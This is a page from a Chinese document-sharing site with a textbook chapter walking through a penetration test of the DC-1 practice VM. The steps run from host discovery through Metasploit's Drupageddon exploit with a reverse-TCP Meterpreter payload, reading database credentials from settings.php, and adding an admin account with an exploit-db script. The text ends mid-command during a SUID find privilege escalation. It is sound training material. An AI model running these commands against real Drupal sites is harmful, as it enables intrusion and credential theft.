版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)
文檔簡介
DC-1靶機滲透測試實踐第8章為滲透測試綜合實踐,對綜合的靶場環(huán)境進行黑盒滲透,獲取服務器系統(tǒng)權(quán)限,需要結(jié)合前面課程所學習的內(nèi)容包括信息收集、漏洞查找、漏洞利用、權(quán)限提升等,對綜合滲透環(huán)境進行滲透測試實踐,旨在幫助學者把前面所學習的知識進行融會貫通,學以致用。前言DC-1是一個專門構(gòu)建的易受攻擊的靶機,目標旨在通過滲透測試獲取目標信息,拿到root權(quán)限。要成功完成這一挑戰(zhàn),需要Linux技能、熟悉Linux命令行以及使用基本滲透測試工具的經(jīng)驗。DC-1靶機的下載地址為:/dc/DC-1.zipDC-1靶機滲透測試實踐滲透目標信息收集利用Metasploit進行漏洞探測Drupal框架漏洞利用權(quán)限提升信息收集使用arp-scan探測存活主機輸入命令:arp-scan-l對存活主機進行探測信息收集使用Nmap探測開放端口在探測到存活主機后,進一步對存活主機進行滲透,那么就需要知道主機所提供的服務,此時需要對存活端口進行探測。信息收集服務及版本探測80端口對應的服務為HTTP服務,查看網(wǎng)頁相關(guān)信息可以看到該網(wǎng)站使用CMS為Drupal,在網(wǎng)頁界面和底部都能發(fā)現(xiàn)“Drupal”標簽信息。Drupal簡介Drupal是一個開源的內(nèi)容管理系統(tǒng)(CMS)平臺,它是用PHP寫成的。主要用于構(gòu)造提供多種功能和服務的動態(tài)網(wǎng)站,這些功能包括用戶管理(UserAdministration)、發(fā)布工作流(PublishingWorkflow)、討論、新聞聚合(NewsAggregation)、元數(shù)據(jù)(Metadata)操作和用于內(nèi)容共享的XML發(fā)布。Drupal有一個優(yōu)秀的模塊化結(jié)構(gòu),提供了許多模塊,包括短消息、個性化書簽、網(wǎng)站管理、Blog、日記、電子商務、電子出版、留言簿、Job、網(wǎng)上電影院、論壇、投票等模塊。并且Drupal模塊的下載、安裝、定制非常方便。滲透目標信息收集利用Metasploit進行漏洞探測Drupal框架漏洞利用權(quán)限提升漏洞探測通過Metasploit查找Drupal架構(gòu)漏洞利用的腳本,在Kali終端中輸入msfconsole,啟動Metasploit,進一步搜索Drupal架構(gòu)利用漏洞。在Metasploit中輸入SearchDrupal,查找漏洞利用模塊。在Matesploit中搜索到可利用模塊后,對漏洞進行利用。例如,選擇模塊drupal_drupageddon漏洞探測滲透目標信息收集利用Metasploit進行漏洞探測Drupal框架漏洞利用權(quán)限提升模塊drupal_drupageddon具體命令如下:useexploit/multi/http/drupal_drupageddonsetpayloadphp/meterpreter/reverse_tcpsetrhosts46exploit漏洞利用漏洞利用在利用成功后,Matesploit進入后滲透meterpreter模塊,輸入“shell”,獲取普通shell。漏洞利用Drupal框架的配置文件路徑為sites/default/files。進入配置文件路徑后,輸入pwd查看當前所處目錄,確認為Drupal默認配置文件目錄。漏洞利用Drupal框架的數(shù)據(jù)庫賬號密碼可以在settings.php中查看到,輸入“cat/var/www/sites/default/settings.php”,查看settings.php內(nèi)容,獲得了數(shù)據(jù)庫賬號和密碼。漏洞利用輸入“whoami”查看當前獲取shell權(quán)限為www-data。漏洞利用建立一個更高權(quán)限的交互式shell來控制靶機輸入命令:python-c'importpty;pty.spawn("/bin/bash")'來獲取Python返回來的交互式shell,然后使用獲取到的數(shù)據(jù)庫用戶密碼連接數(shù)據(jù)庫。漏洞利用接下來查看數(shù)據(jù)庫,在drupaldb庫中尋找用戶表。最后在drupaldb庫users表中發(fā)現(xiàn)admin用戶,但是admin用戶的密碼是被加密過的。漏洞利用查看Drupal版本,輸入“cat/var/www/includes/bootstrap.inc|grepVERSION”,確定Drupal版本為7.24。漏洞利用輸入“searchsploitdrupal”查找drupal的利用代碼。漏洞利用利用腳本增加一組用戶名密碼admin1/admin1,執(zhí)行下述命令新增用戶。命令如下:python2/usr/share/exploitdb/exploits/php/webapps/34992.py-t46/-uadmin1-padmin1漏洞利用成功添加用戶后,即可使用用戶名admin1,密碼admin1登錄Web頁面。滲透目標信息收集利用Metasploit進行漏洞探測Drupal框架漏洞利用權(quán)限提升權(quán)限提升查找系統(tǒng)中具有suid設置的所有文件,輸入“find/-perm-40002>/dev/null”進行查找。權(quán)限提升通過find方式進行提權(quán),依次輸入下述命令:touchvenusfind/-typef-namevenus-exec"whoami"\;find/-t
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年粵人版七年級物理上冊月考試卷
- 2025年度住宅裝修木工支模施工合同協(xié)議4篇
- 2025年浙教新版選擇性必修3歷史上冊月考試卷
- 二零二五版門窗行業(yè)綠色供應鏈管理合同7篇
- 二零二五年度幕墻節(jié)能診斷與改進合同4篇
- 二零二五年度寧波廣告?zhèn)髅狡髽I(yè)勞動合同與知識產(chǎn)權(quán)保護協(xié)議4篇
- 二零二五版定制門窗設計制作與售后服務合同3篇
- 公共管理理論專題知到智慧樹章節(jié)測試課后答案2024年秋武漢科技大學
- 二零二五年度農(nóng)藥生產(chǎn)許可證延續(xù)及變更服務合同3篇
- 二零二五年度電子信息產(chǎn)業(yè)農(nóng)民工勞動合同參考文本4篇
- 2024年江西生物科技職業(yè)學院單招職業(yè)技能測試題庫帶解析答案
- 橋本甲狀腺炎-90天治療方案
- 《量化交易之門》連載27:風險的角度談收益MAR和夏普比率
- (2024年)安全注射培訓課件
- 2024版《建設工程開工、停工、復工安全管理臺賬表格(流程圖、申請表、報審表、考核表、通知單等)》模版
- 部編版《道德與法治》六年級下冊教材分析萬永霞
- 粘液腺肺癌病理報告
- 酒店人防管理制度
- 油田酸化工藝技術(shù)
- 上海高考英語詞匯手冊列表
- 移動商務內(nèi)容運營(吳洪貴)任務五 其他內(nèi)容類型的生產(chǎn)
評論
0/150
提交評論